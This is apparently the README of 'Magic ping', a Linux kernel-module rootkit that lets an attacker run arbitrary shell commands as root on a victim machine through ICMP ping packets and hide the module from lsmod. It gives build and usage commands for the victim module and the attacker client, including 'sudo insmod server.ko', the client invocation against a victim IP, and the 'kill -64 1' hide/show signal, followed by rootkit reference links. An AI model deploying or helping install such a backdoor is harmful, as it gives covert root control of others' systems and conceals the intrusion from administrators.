Magic ping - shell execution
- Romete shell command execution by ping.
- Hiding (or Showing) Kernel Module from Userspace.
compile server(victim) kernel module:
cd server && makeClient(attacker):
cd client && makeRomete server (victim):
sudo insmod server.ko
Need root privilege to send icmp packets for ping.
sudo ./client <victim ip address>
Then you can let remote victim execute whatever shell command you input as root privilege (some command may need full path).
Send signal 64 to show or hide:
kill -64 1
Use lsmod to check.
- Hacking the Linux Kernel Network Stack
- Does tcpdump bypass iptables?
- linux-network-programming-ping.c
- Given a git commit hash, how to find out which kernel release contains it?
- Linux Rootkits Part 5: Hiding Kernel Modules from Userspace
- Hooking Linux Kernel Functions, Part 2: How to Hook Functions with Ftrace